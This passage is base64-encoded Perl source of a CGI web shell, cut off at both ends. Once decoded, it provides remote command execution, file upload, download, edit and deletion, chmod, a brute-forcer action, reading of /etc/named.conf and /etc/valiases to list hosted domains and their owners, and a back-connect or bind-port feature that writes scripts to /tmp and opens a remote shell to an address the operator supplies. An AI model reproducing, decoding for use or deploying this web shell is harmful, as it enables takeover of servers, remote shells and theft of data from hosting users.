0JUZVhOMFpXMXBibVp2T2lBbk95QjFibUZ0WlNBdFlUdGxZMmh2TzJWamFHOGdKMXNyWFNCVmMyVnlhVzVtYnpvZ0p6c2dhV1E3WldOb2J6dGxZMmh2SUNkYksxMGdSR2x5WldOMGIzSjVPaUFuT3lCd2QyUTdaV05vYnpzZ1pXTm9ieUFuV3l0ZElGTm9aV3hzT2lBbk95UlRhR1ZzYkNJcE93MEtDV05zYjNObEtGTlVSRWxPS1RzTkNnbGpiRzl6WlNoVFZFUlBWVlFwT3cwS0NXTnNiM05sS0ZOVVJFVlNVaWs3RFFwOURRbz0iOwoKCSRDbGllbnRBZGRyID0gJGlueydjbGllbnRhZGRyJ307CgkkQ2xpZW50UG9ydCA9IGludCgkaW57J2NsaWVudHBvcnQnfSk7CglpZigkQ2xpZW50UG9ydCBlcSAwKQoJewoJCXJldHVybiAmQmFja0JpbmRGb3JtOwoJfWVsc2lmKCEkQ2xpZW50QWRkciBlcSAiIikKCXsKCQkkRGF0YT1kZWNvZGVfYmFzZTY0KCRiYWNrcGVybCk7CgkJaWYoLXcgIi90bXAvIikKCQl7CgkJCSRGaWxlPSIvdG1wL2JhY2tjb25uZWN0LnBsIjsJCgkJfWVsc2UKCQl7CgkJCSRGaWxlPSRDdXJyZW50RGlyLiRQYXRoU2VwLiJiYWNrY29ubmVjdC5wbCI7CgkJfQoJCW9wZW4oRklMRSwgIj4kRmlsZSIpOwoJCXByaW50IEZJTEUgJERhdGE7CgkJY2xvc2UgRklMRTsKCQlzeXN0ZW0oInBlcmwgYmFja2Nvbm5lY3QucGwgJENsaWVudEFkZHIgJENsaWVudFBvcnQiKTsKCQl1bmxpbmsoJEZpbGUpOwoJCWV4aXQgMDsKCX1lbHNlCgl7CgkJJERhdGE9ZGVjb2RlX2Jhc2U2NCgkYmluZHBlcmwpOwoJCWlmKC13ICIvdG1wIikKCQl7CgkJCSRGaWxlPSIvdG1wL2JpbmRwb3J0LnBsIjsJCgkJfWVsc2UKCQl7CgkJCSRGaWxlPSRDdXJyZW50RGlyLiRQYXRoU2VwLiJiaW5kcG9ydC5wbCI7CgkJfQoJCW9wZW4oRklMRSwgIj4kRmlsZSIpOwoJCXByaW50IEZJTEUgJERhdGE7CgkJY2xvc2UgRklMRTsKCQlzeXN0ZW0oInBlcmwgYmluZHBvcnQucGwgJENsaWVudFBvcnQiKTsKCQl1bmxpbmsoJEZpbGUpOwoJCWV4aXQgMDsKCX0KfQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgIEFycmF5IExpc3QgRGlyZWN0b3J5CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFJtRGlyKCQpIAp7CglteSAkZGlyID0gc2hpZnQ7CiAgICBpZihvcGVuZGlyKERJUiwkZGlyKSkKCXsKCQl3aGlsZSgkZmlsZSA9IHJlYWRkaXIoRElSKSkKCQl7CgkJCWlmKCgkZmlsZSBuZSAiLiIpICYmICgkZmlsZSBuZSAiLi4iKSkKCQkJewoJCQkJJGZpbGU9ICRkaXIuJFBhdGhTZXAuJGZpbGU7CgkJCQlpZigtZCAkZmlsZSkKCQkJCXsKCQkJCQkmUm1EaXIoJGZpbGUpOwoJCQkJfQoJCQkJZWxzZQoJCQkJewoJCQkJCXVubGluaygkZmlsZSk7CgkJCQl9CgkJCX0KCQl9CgkJY2xvc2VkaXIoRElSKTsKCX0KCWlmKCFybWRpcigkZGlyKSkKCXsKCQkKCX0KfQpzdWIgRmlsZU93bmVyKCQpCnsKCW15ICRmaWxlID0gc2hpZnQ7CglpZigtZSAkZmlsZSkKCXsKCQkoJHVpZCwkZ2lkKSA9IChzdGF0KCRmaWxlKSlbNCw1XTsKCQlpZigkV2luTlQpCgkJewoJCQlyZXR1cm4gIj8/PyI7CgkJfQoJCWVsc2UKCQl7CgkJCSRuYW1lPWdldHB3dWlkKCR1aWQpOwoJCQkkZ3JvdXA9Z2V0Z3JnaWQoJGdpZCk7CgkJCXJldHVybiAkbmFtZS4iLyIuJGdyb3VwOwoJCX0KCX0KCXJldHVybiAiPz8/IjsKfQpzdWIgUGFyZW50Rm9sZGVyKCQpCnsKCW15ICRwYXRoID0gc2hpZnQ7CglteSAkQ29tbSA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuImNkIC4uIi4kQ21kU2VwLiRDbWRQd2Q7CgljaG9wKCRwYXRoID0gYCRDb21tYCk7CglyZXR1cm4gJHBhdGg7Cn0Kc3ViIEZpbGVQZXJtcygkKQp7CglteSAkZmlsZSA9IHNoaWZ0OwoJbXkgJHVyID0gIi0iOwoJbXkgJHV3ID0gIi0iOwoJaWYoLWUgJGZpbGUpCgl7CgkJaWYoJFdpbk5UKQoJCXsKCQkJaWYoLXIgJGZpbGUpeyAkdXIgPSAiciI7IH0KCQkJaWYoLXcgJGZpbGUpeyAkdXcgPSAidyI7IH0KCQkJcmV0dXJuICR1ciAuICIgLyAiIC4gJHV3OwoJCX1lbHNlCgkJewoJCQkkbW9kZT0oc3RhdCgkZmlsZSkpWzJdOwoJCQkkcmVzdWx0ID0gc3ByaW50ZigiJTA0byIsICRtb2RlICYgMDc3NzcpOwoJCQlyZXR1cm4gJHJlc3VsdDsKCQl9Cgl9CglyZXR1cm4gIjAwMDAiOwp9CnN1YiBGaWxlTGFzdE1vZGlmaWVkKCQpCnsKCW15ICRmaWxlID0gc2hpZnQ7CglpZigtZSAkZmlsZSkKCXsKCQkoJGxhKSA9IChzdGF0KCRmaWxlKSlbOV07CgkJKCRkLCRtLCR5LCRoLCRpKSA9IChsb2NhbHRpbWUoJGxhKSlbMyw0LDUsMiwxXTsKCQkkeSA9ICR5ICsgMTkwMDsKCQlAbW9udGggPSBxdy8xIDIgMyA0IDUgNiA3IDggOSAxMCAxMSAxMi87CgkJJGxtdGltZSA9IHNwcmludGYoIiUwMmQvJXMvJTRkICUwMmQ6JTAyZCIsJGQsJG1vbnRoWyRtXSwkeSwkaCwkaSk7CgkJcmV0dXJuICRsbXRpbWU7Cgl9CglyZXR1cm4gIj8/PyI7Cn0Kc3ViIEZpbGVTaXplKCQpCnsKCW15ICRmaWxlID0gc2hpZnQ7CglpZigtZiAkZmlsZSkKCXsKCQlyZXR1cm4gLXMgJGZpbGU7Cgl9CglyZXR1cm4gIjAiOwoKfQpzdWIgUGFyc2VGaWxlU2l6ZSgkKQp7CglteSAkc2l6ZSA9IHNoaWZ0OwoJaWYoJHNpemUgPD0gMTAyNCkKCXsKCQlyZXR1cm4gJHNpemUuICIgQiI7Cgl9CgllbHNlCgl7CgkJaWYoJHNpemUgPD0gMTAyNCoxMDI0KSAKCQl7CgkJCSRzaXplID0gc3ByaW50ZigiJS4wMmYiLCRzaXplIC8gMTAyNCk7CgkJCXJldHVybiAkc2l6ZS4iIEtCIjsKCQl9CgkJZWxzZSAKCQl7CgkJCSRzaXplID0gc3ByaW50ZigiJS4yZiIsJHNpemUgLyAxMDI0IC8gMTAyNCk7CgkJCXJldHVybiAkc2l6ZS4iIE1CIjsKCQl9Cgl9Cn0Kc3ViIHRyaW0oJCkKewoJbXkgJHN0cmluZyA9IHNoaWZ0OwoJJHN0cmluZyA9fiBzL15ccysvLzsKCSRzdHJpbmcgPX4gcy9ccyskLy87CglyZXR1cm4gJHN0cmluZzsKfQpzdWIgQWRkU2xhc2hlcygkKQp7CglteSAkc3RyaW5nID0gc2hpZnQ7Cgkkc3RyaW5nPX4gcy9cXC9cXFxcL2c7CglyZXR1cm4gJHN0cmluZzsKfQpzdWIgTGlzdERpcgp7CglteSAkcGF0aCA9ICRDdXJyZW50RGlyLiRQYXRoU2VwOwoJJHBhdGg9fiBzL1xcXFwvXFwvZzsKCW15ICRyZXN1bHQgPSAiPGZvcm0gbmFtZT0nZicgYWN0aW9uPSckU2NyaXB0TG9jYXRpb24nPjxzcGFuIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7IGZvbnQtd2VpZ2h0OiBib2xkOyc+UGF0aDogWyAiLiZBZGRMaW5rRGlyKCJndWkiKS4iIF0gPC9zcGFuPjxpbnB1dCB0eXBlPSd0ZXh0JyBuYW1lPSdkJyBzaXplPSc0MCcgdmFsdWU9JyRDdXJyZW50RGlyJyAvPjxpbnB1dCB0eXBlPSdoaWRkZW4nIG5hbWU9J2EnIHZhbHVlPSdndWknPjxpbnB1dCBjbGFzcz0nc3VibWl0JyB0eXBlPSdzdWJtaXQnIHZhbHVlPSdDaGFuZ2UnPjwvZm9ybT4iOwoJaWYoLWQgJHBhdGgpCgl7CgkJbXkgQGZuYW1lID0gKCk7CgkJbXkgQGRuYW1lID0gKCk7CgkJaWYob3BlbmRpcihESVIsJHBhdGgpKQoJCXsKCQkJd2hpbGUoJGZpbGUgPSByZWFkZGlyKERJUikpCgkJCXsKCQkJCSRmPSRwYXRoLiRmaWxlOwoJCQkJaWYoLWQgJGYpCgkJCQl7CgkJCQkJcHVzaChAZG5hbWUsJGZpbGUpOwoJCQkJfQoJCQkJZWxzZQoJCQkJewoJCQkJCXB1c2goQGZuYW1lLCRmaWxlKTsKCQkJCX0KCQkJfQoJCQljbG9zZWRpcihESVIpOwoJCX0KCQlAZm5hbWUgPSBzb3J0IHsgbGMoJGEpIGNtcCBsYygkYikgfSBAZm5hbWU7CgkJQGRuYW1lID0gc29ydCB7IGxjKCRhKSBjbXAgbGMoJGIpIH0gQGRuYW1lOwoJCSRyZXN1bHQgLj0gIjxkaXY+PHRhYmxlIHdpZHRoPSc5MCUnIGNsYXNzPSdsaXN0ZGlyJz4KCgkJPHRyIHN0eWxlPSdiYWNrZ3JvdW5kLWNvbG9yOiAjM2UzZTNlJz48dGg+RmlsZSBOYW1lPC90aD4KCQk8dGggc3R5bGU9J3dpZHRoOjEwMHB4Oyc+RmlsZSBTaXplPC90aD4KCQk8dGggc3R5bGU9J3dpZHRoOjE1MHB4Oyc+T3duZXI8L3RoPgoJCTx0aCBzdHlsZT0nd2lkdGg6MTAwcHg7Jz5QZXJtaXNzaW9uPC90aD4KCQk8dGggc3R5bGU9J3dpZHRoOjE1MHB4Oyc+TGFzdCBNb2RpZmllZDwvdGg+CgkJPHRoIHN0eWxlPSd3aWR0aDoyNjBweDsnPkFjdGlvbjwvdGg+PC90cj4iOwoJCW15ICRzdHlsZT0ibGluZSI7CgkJbXkgJGk9MDsKCQlmb3JlYWNoIG15ICRkIChAZG5hbWUpCgkJewoJCQkkc3R5bGU9ICgkc3R5bGUgZXEgImxpbmUiKSA/ICJub3RsaW5lIjogImxpbmUiOwoJCQkkZCA9ICZ0cmltKCRkKTsKCQkJJGRpcm5hbWU9JGQ7CgkJCWlmKCRkIGVxICIuLiIpIAoJCQl7CgkJCQkkZCA9ICZQYXJlbnRGb2xkZXIoJHBhdGgpOwoJCQl9CgkJCWVsc2lmKCRkIGVxICIuIikgCgkJCXsKCQkJCSRkID0gJHBhdGg7CgkJCX0KCQkJZWxzZSAKCQkJewoJCQkJJGQgPSAkcGF0aC4kZDsKCQkJfQoJCQkkcmVzdWx0IC49ICI8dHIgY2xhc3M9JyRzdHlsZSc+CgoJCQk8dGQgaWQ9J0ZpbGVfJGknIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7IGZvbnQtd2VpZ2h0OiBib2xkOyc+PGEgIGhyZWY9Jz9hPWd1aSZkPSIuJGQuIic+WyAiLiRkaXJuYW1lLiIgXTwvYT48L3RkPiI7CgkJCSRyZXN1bHQgLj0gIjx0ZD5ESVI8L3RkPiI7CgkJCSRyZXN1bHQgLj0gIjx0ZCBzdHlsZT0ndGV4dC1hbGlnbjpjZW50ZXI7Jz4iLiZGaWxlT3duZXIoJGQpLiI8L3RkPiI7CgkJCSRyZXN1bHQgLj0gIjx0ZCBpZD0nRmlsZVBlcm1zXyRpJyBzdHlsZT0ndGV4dC1hbGlnbjpjZW50ZXI7JyBvbmRibGNsaWNrPVwicm1fY2htb2RfZm9ybSh0aGlzLCIuJGkuIiwnIi4mRmlsZVBlcm1zKCRkKS4iJywnIi4kZGlybmFtZS4iJylcIiA+PHNwYW4gb25jbGljaz1cImNobW9kX2Zvcm0oIi4kaS4iLCciLiRkaXJuYW1lLiInKVwiID4iLiZGaWxlUGVybXMoJGQpLiI8L3NwYW4+PC90ZD4iOwoJCQkkcmVzdWx0IC49ICI8dGQgc3R5bGU9J3RleHQtYWxpZ246Y2VudGVyOyc+Ii4mRmlsZUxhc3RNb2RpZmllZCgkZCkuIjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcjsnPjxhIGhyZWY9J2phdmFzY3JpcHQ6cmV0dXJuIGZhbHNlOycgb25jbGljaz1cInJlbmFtZV9mb3JtKCRpLCckZGlybmFtZScsJyIuJkFkZFNsYXNoZXMoJkFkZFNsYXNoZXMoJGQpKS4iJylcIj5SZW5hbWU8L2E+ICB8IDxhIG9uY2xpY2s9XCJpZighY29uZmlybSgnUmVtb3ZlIGRpcjogJGRpcm5hbWUgPycpKSB7IHJldHVybiBmYWxzZTt9XCIgaHJlZj0nP2E9Z3VpJmQ9JHBhdGgmcmVtb3ZlPSRkaXJuYW1lJz5SZW1vdmU8L2E+PC90ZD4iOwoJCQkkcmVzdWx0IC49ICI8L3RyPiI7CgkJCSRpKys7CgkJfQoJCWZvcmVhY2ggbXkgJGYgKEBmbmFtZSkKCQl7CgkJCSRzdHlsZT0gKCRzdHlsZSBlcSAibGluZSIpID8gIm5vdGxpbmUiOiAibGluZSI7CgkJCSRmaWxlPSRmOwoJCQkkZiA9ICRwYXRoLiRmOwoJCQkkdmlldyA9ICI/ZGlyPSIuJHBhdGguIiZ2aWV3PSIuJGY7CgkJCSRyZXN1bHQgLj0gIjx0ciBjbGFzcz0nJHN0eWxlJz48dGQgaWQ9J0ZpbGVfJGknIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7Jz48YSBocmVmPSc/YT1jb21tYW5kJmQ9Ii4kcGF0aC4iJmM9ZWRpdCUyMCIuJGZpbGUuIic+Ii4kZmlsZS4iPC9hPjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkPiIuJlBhcnNlRmlsZVNpemUoJkZpbGVTaXplKCRmKSkuIjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcjsnPiIuJkZpbGVPd25lcigkZikuIjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkIGlkPSdGaWxlUGVybXNfJGknIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcjsnIG9uZGJsY2xpY2s9XCJybV9jaG1vZF9mb3JtKHRoaXMsIi4kaS4iLCciLiZGaWxlUGVybXMoJGYpLiInLCciLiRmaWxlLiInKVwiID48c3BhbiBvbmNsaWNrPVwiY2htb2RfZm9ybSgkaSwnJGZpbGUnKVwiID4iLiZGaWxlUGVybXMoJGYpLiI8L3NwYW4+PC90ZD4iOwoJCQkkcmVzdWx0IC49ICI8dGQgc3R5bGU9J3RleHQtYWxpZ246Y2VudGVyOyc+Ii4mRmlsZUxhc3RNb2RpZmllZCgkZikuIjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcjsnPjxhIGhyZWY9Jz9hPWNvbW1hbmQmZD0iLiRwYXRoLiImYz1lZGl0JTIwIi4kZmlsZS4iJz5FZGl0PC9hPiB8IDxhIGhyZWY9J2phdmFzY3JpcHQ6cmV0dXJuIGZhbHNlOycgb25jbGljaz1cInJlbmFtZV9mb3JtKCRpLCckZmlsZScsJ2YnKVwiPlJlbmFtZTwvYT4gfCA8YSBocmVmPSc/YT1kb3dubG9hZCZvPWdvJmY9Ii4kZi4iJz5Eb3dubG9hZDwvYT4gfCA8YSBvbmNsaWNrPVwiaWYoIWNvbmZpcm0oJ1JlbW92ZSBmaWxlOiAkZmlsZSA/JykpIHsgcmV0dXJuIGZhbHNlO31cIiBocmVmPSc/YT1ndWkmZD0kcGF0aCZyZW1vdmU9JGZpbGUnPlJlbW92ZTwvYT48L3RkPiI7CgkJCSRyZXN1bHQgLj0gIjwvdHI+IjsKCQkJJGkrKzsKCQl9CgkJJHJlc3VsdCAuPSAiPC90YWJsZT48L2Rpdj4iOwoJfQoJcmV0dXJuICRyZXN1bHQ7Cn0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRyeSB0byBWaWV3IExpc3QgVXNlcgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBWaWV3RG9tYWluVXNlcgp7CglvcGVuIChkb21haW5zLCAnL2V0Yy9uYW1lZC5jb25mJykgb3IgJGVycj0xOwoJbXkgQGNuenMgPSA8ZG9tYWlucz47CgljbG9zZSBkMG1haW5zOwoJbXkgJHN0eWxlPSJsaW5lIjsKCW15ICRyZXN1bHQ9IjxoNT48Zm9udCBzdHlsZT0nZm9udDogMTVwdCBWZXJkYW5hO2NvbG9yOiAjZmY5OTAwOyc+SG9hbmcgU2EgLSBUcnVvbmcgU2E8L2ZvbnQ+PC9oNT4iOwoJaWYgKCRlcnIpCgl7CgkJJHJlc3VsdCAuPSAgKCc8cD5DMHVsZG5cJ3QgQnlwYXNzIGl0ICwgU29ycnk8L3A+Jyk7CgkJcmV0dXJuICRyZXN1bHQ7Cgl9ZWxzZQoJewoJCSRyZXN1bHQgLj0gJzx0YWJsZT48dHI+PHRoPkRvbWFpbnM8L3RoPiA8dGg+VXNlcjwvdGg+PC90cj4nOwoJfQoJZm9yZWFjaCBteSAkb25lIChAY256cykKCXsKCQlpZigkb25lID1+IG0vLio/em9uZSAiKC4qPykiIHsvKQoJCXsJCgkJCSRzdHlsZT0gKCRzdHlsZSBlcSAibGluZSIpID8gIm5vdGxpbmUiOiAibGluZSI7CgkJCSRmaWxlbmFtZT0gIi9ldGMvdmFsaWFzZXMvIi4kb25lOwoJCQkkb3duZXIgPSBnZXRwd3VpZCgoc3RhdCgkZmlsZW5hbWUpKVs0XSk7CgkJCSRyZXN1bHQgLj0gJzx0ciBjbGFzcz0iJHN0eWxlIiB3aWR0aD01MCU+PHRkPicuJG9uZS4nIDwvdGQ+PHRkPiAnLiRvd25lci4nPC90ZD48L3RyPic7CgkJfQoJfQoJJHJlc3VsdCAuPSAnPC90YWJsZT4nOwoJcmV0dXJuICRyZXN1bHQ7Cn0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFZpZXcgTG9nCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFZpZXdMb2cKewoJaWYoJFdpbk5UKQoJewoJCXJldHVybiAiPGgyPjxmb250IHN0eWxlPSdmb250OiAyMHB0IFZlcmRhbmE7Y29sb3I6ICNmZjk5MDA7Jz5Eb24ndCBydW4gb24gV2luZG93czwvZm9udD48L2gyPiI7Cgl9CglteSAkcmVzdWx0PSI8dGFibGU+PHRyPjx0aD5QYXRoIExvZzwvdGg+PHRoPlN1Ym1pdDwvdGg+PC90cj4iOwoJbXkgQHBhdGhsb2c9KAoJCQkJJy91c3IvbG9jYWwvYXBhY2hlL2xvZ3MvZXJyb3JfbG9nJywKCQkJCScvdmFyL2xvZy9odHRwZC9lcnJvcl9sb2cnLAoJCQkJJy91c3IvbG9jYWwvYXBhY2hlL2xvZ3MvYWNjZXNzX2xvZycKCQkJCSk7CglteSAkaT0wOwoJbXkgJHBlcm1zOwoJbXkgJHNsOwoJZm9yZWFjaCBteSAkbG9nIChAcGF0aGxvZykKCXsKCQlpZigtdyAkbG9nKQoJCXsKCQkJJHBlcm1zPSJPSyI7CgkJfWVsc2UKCQl7CgkJCWNob3AoJHNsID0gYGxuIC1zICRsb2cgZXJyb3JfbG9nXyRpYCk7CgkJCWlmKCZ0cmltKCRscykgZXEgIiIpCgkJCXsKCQkJCWlmKC1yICRscykKCQkJCXsKCQkJCQkkcGVybXM9Ik9LIjsKCQkJCQkkbG9nPSJlcnJvcl9sb2dfIi4kaTsKCQkJCX0KCQkJfWVsc2UKCQkJewoJCQkJJHBlcm1zPSI8Zm9udCBzdHlsZT0nY29sb3I6IHJlZDsnPkNhbmNlbDxmb250PiI7CgkJCX0KCQl9CgkJJHJlc3VsdCAuPTw8RU5EOwoJCTx0cj4KCgkJCTxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiPgoJCQk8dGQ+PGlucHV0IHR5cGU9InRleHQiIG9ua2V5dXA9ImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdsb2dfJGknKS52YWx1ZT0nbGVzcyAnICsgdGhpcy52YWx1ZTsiIHZhbHVlPSIkbG9nIiBzaXplPSc1MCcvPjwvdGQ+CgkJCTx0ZD48aW5wdXQgY2xhc3M9InN1Ym1pdCIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iVHJ5IiAvPjwvdGQ+CgkJCTxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJsb2dfJGkiIG5hbWU9ImMiIHZhbHVlPSJsZXNzICRsb2ciLz4KCQkJPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImNvbW1hbmQiIC8+CgkJCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciIgLz4KCQkJPC9mb3JtPgoJCQk8dGQ+JHBlcm1zPC90ZD4KCgkJPC90cj4KRU5ECgkJJGkrKzsKCX0KCSRyZXN1bHQgLj0iPC90YWJsZT4iOwoJcmV0dXJuICRyZXN1bHQ7Cn0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIE1haW4gUHJvZ3JhbSAtIEV4ZWN1dGlvbiBTdGFydHMgSGVyZQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiZSZWFkUGFyc2U7CiZHZXRDb29raWVzOwoKJFNjcmlwdExvY2F0aW9uID0gJEVOVnsnU0NSSVBUX05BTUUnfTsKJFNlcnZlck5hbWUgPSAkRU5WeydTRVJWRVJfTkFNRSd9OwokTG9naW5QYXNzd29yZCA9ICRpbnsncCd9OwokUnVuQ29tbWFuZCA9ICRpbnsnYyd9OwokVHJhbnNmZXJGaWxlID0gJGlueydmJ307CiRPcHRpb25zID0gJGlueydvJ307CiRBY3Rpb24gPSAkaW57J2EnfTsKCiRBY3Rpb24gPSAiY29tbWFuZCIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNpZmllZCwgdXNlIGRlZmF1bHQKCiMgZ2V0IHRoZSBkaXJlY3RvcnkgaW4gd2hpY2ggdGhlIGNvbW1hbmRzIHdpbGwgYmUgZXhlY3V0ZWQKJEN1cnJlbnREaXIgPSAmdHJpbSgkaW57J2QnfSk7CiMgbWFjIGRpbmggeHVhdCB0aG9uZyB0aW4gbmV1IGtvIGNvIGxlbmggbmFvIQokUnVuQ29tbWFuZD0gJFdpbk5UPyJkaXIiOiJkaXIgLWxpYSIgaWYoJFJ1bkNvbW1hbmQgZXEgIiIpOwpjaG9wKCRDdXJyZW50RGlyID0gYCRDbWRQd2RgKSBpZigkQ3VycmVudERpciBlcSAiIik7CgokTG9nZ2VkSW4gPSAkQ29va2llc3snU0FWRURQV0QnfSBlcSAkUGFzc3dvcmQ7CgppZigkQWN0aW9uIGVxICJsb2dpbiIgfHwgISRMb2dnZWRJbikgCQkjIHVzZXIgbmVlZHMvaGFzIHRvIGxvZ2luCnsKCSZQZXJmb3JtTG9naW47Cn1lbHNpZigkQWN0aW9uIGVxICJndWkiKSAjIEdVSSBkaXJlY3RvcnkKewoJJlByaW50UGFnZUhlYWRlcjsKCWlmKCEkV2luTlQpCgl7CgkJJGNobW9kPWludCgkaW57J2NobW9kJ30pOwoJCWlmKCEoJGNobW9kIGVxIDApKQoJCXsKCQkJJGNobW9kPWludCgkaW57J2NobW9kJ30pOwoJCQkkZmlsZT0kQ3VycmVudERpci4kUGF0aFNlcC4kVHJhbnNmZXJGaWxlOwoJCQljaG9wKCRyZXN1bHQ9IGBjaG1vZCAkY2htb2QgIiRmaWxlImApOwoJCQlpZigmdHJpbSgkcmVzdWx0KSBlcSAiIikKCQkJewoJCQkJcHJpbnQgIjxydW4+IERvbmUhIDwvcnVuPjxicj4iOwoJCQl9ZWxzZQoJCQl7CgkJCQlwcmludCAiPHJ1bj4gU29ycnkhIFlvdSBkb250IGhhdmUgcGVybWlzc2lvbnMhIDwvcnVuPjxicj4iOwoJCQl9CgkJfQoJfQoJJHJlbmFtZT0kaW57J3JlbmFtZSd9OwoJaWYoISRyZW5hbWUgZXEgIiIpCgl7CgkJaWYocmVuYW1lKCRUcmFuc2ZlckZpbGUsJHJlbmFtZSkpCgkJewoJCQlwcmludCAiPHJ1bj4gRG9uZSEgPC9ydW4+PGJyPiI7CgkJfWVsc2UKCQl7CgkJCXByaW50ICI8cnVuPiBTb3JyeSEgWW91IGRvbnQgaGF2ZSBwZXJtaXNzaW9ucyEgPC9ydW4+PGJyPiI7CgkJfQoJfQoJJHJlbW92ZT0kaW57J3JlbW92ZSd9OwoJaWYoJHJlbW92ZSBuZSAiIikKCXsKCQkkcm0gPSAkQ3VycmVudERpci4kUGF0aFNlcC4kcmVtb3ZlOwoJCWlmKC1kICRybSkKCQl7CgkJCSZSbURpcigkcm0pOwoJCX1lbHNlCgkJewoJCQlpZih1bmxpbmsoJHJtKSkKCQkJewoJCQkJcHJpbnQgIjxydW4+IERvbmUhIDwvcnVuPjxicj4iOwoJCQl9ZWxzZQoJCQl7CgkJCQlwcmludCAiPHJ1bj4gU29ycnkhIFlvdSBkb250IGhhdmUgcGVybWlzc2lvbnMhIDwvcnVuPjxicj4iOwoJCQl9CQkJCgkJfQoJfQoJcHJpbnQgJkxpc3REaXI7Cgp9CmVsc2lmKCRBY3Rpb24gZXEgImNvbW1hbmQiKQkJCQkgCSMgdXNlciB3YW50cyB0byBydW4gYSBjb21tYW5kCnsKCSZQcmludFBhZ2VIZWFkZXIoImMiKTsKCXByaW50ICZFeGVjdXRlQ29tbWFuZDsKfQplbHNpZigkQWN0aW9uIGVxICJzYXZlIikJCQkJIAkjIHVzZXIgd2FudHMgdG8gc2F2ZSBhIGZpbGUKewoJJlByaW50UGFnZUhlYWRlcjsKCWlmKCZTYXZlRmlsZSgkaW57J2RhdGEnfSwkaW57J2ZpbGUnfSkpCgl7CgkJcHJpbnQgIjxydW4+IERvbmUhIDwvcnVuPjxicj4iOwoJfWVsc2UKCXsKCQlwcmludCAiPHJ1bj4gU29ycnkhIFlvdSBkb250IGhhdmUgcGVybWlzc2lvbnMhIDwvcnVuPjxicj4iOwoJfQoJcHJpbnQgJkxpc3REaXI7Cn0KZWxzaWYoJEFjdGlvbiBlcSAidXBsb2FkIikgCQkJCQkjIHVzZXIgd2FudHMgdG8gdXBsb2FkIGEgZmlsZQp7CgkmUHJpbnRQYWdlSGVhZGVyOwoKCXByaW50ICZVcGxvYWRGaWxlOwp9CmVsc2lmKCRBY3Rpb24gZXEgImJhY2tiaW5kIikgCQkJCSMgdXNlciB3YW50cyB0byBiYWNrIGNvbm5lY3Qgb3IgYmluZCBwb3J0CnsKCSZQcmludFBhZ2VIZWFkZXIoImNsaWVudHBvcnQiKTsKCXByaW50ICZCYWNrQmluZDsKfQplbHNpZigkQWN0aW9uIGVxICJicnV0ZWZvcmNlciIpIAkJCSMgdXNlciB3YW50cyB0byBicnV0ZSBmb3JjZQp7CgkmUHJpbnRQYWdlSGVhZGVyOwoJcHJpbnQgJkJydXRlRm9yY2VyOwp9ZWxzaWYoJEFjdGlvbiBlcSAiZG93bmxvYWQiKSAJCQkJIyB1c2VyIHdhbnRzIHRvIGRvd25sb2FkIGEgZmlsZQp7CglwcmludCAmRG93bmxvYWRGaWxlOwp9ZWxzaWYoJEFjdGlvbiBlcSAiY2hlY2tsb2ciKSAJCQkJIyB1c2VyIHdhbnRzIHRvIHZpZXcgbG9nIGZpbGUKewoJJlByaW50UGFnZUhlYWRlcjsKCXByaW50ICZWaWV3TG9nOwoKfWVsc2lmKCRBY3Rpb24gZXEgImRvbWFpbnN1c2VyIikgCQkJIyB1c2VyIHdhbnRzIHRvIHZpZXcgbGlzdCB1c2VyL2RvbWFpbgp7CgkmUHJpbnRQYWdlSGVhZGVyOwoJcHJpbnQgJlZpZXdEb21haW5Vc2VyOwp9ZWxzaWYoJEFjdGlvbiBlcSAibG9nb3V0IikgCQkJCSMgdXNlciB3YW50cyB0byBsb2dvdXQKewoJJlBlcmZvcm1Mb2